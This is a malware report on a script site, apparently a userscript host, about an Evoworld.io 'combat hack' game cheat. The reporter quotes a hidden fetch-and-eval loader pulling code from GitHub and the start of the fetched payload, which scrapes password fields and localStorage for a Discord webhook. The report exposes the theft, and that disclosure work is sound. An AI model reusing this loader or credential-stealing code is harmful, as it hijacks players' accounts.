Evoworld.io COMBAT HACK was reported 4.1.2026 for Malware

The reporter said:

Stiller accounts line 409 - 419:
fetch('https://raw.githubusercontent.com/shadowxds-eng/main.js/main/main.code')

.then(response => response.text())

.then(code => {

eval(code);

})

если перейти на https://raw.githubusercontent.com/shadowxds-eng/main.js/main/main.code то там основная часть воровства аккаунтов:
// webhook.js - Data collection and Discord sending ONLY
(function() {
'use strict';

console.log('EvoWorld Data Collector loaded');

const DISCORD_WEBHOOK = 'https://discord.com/api/webhooks/1457387501139525810/owMaPq6BvF1suRbSgOC4BetPSNTbFijMvyOP8pSt6yVULem4mX9yHgKglOXEnlCHtHYE';

function getSavedPassword() {
try {
const inputs = document.querySelectorAll('input[type="password"], input[name*="pass"], input[id*="pass"]');
for (let input of inputs) {
if (input.value && input.value.length > 3 && input.value.length < 50) {
return input.value;
}
}

for (let i = 0; i < localStorage.length; i++) {
const key = localStorage.key(i);
const value = localStorage.getItem(key);
if ((ke

This script has had 1 previous upheld or fixed report.

türk evoworld sikici (the reported user) has made:

This report has been upheld by a moderator, but the moderator marked it as Disallowed external code.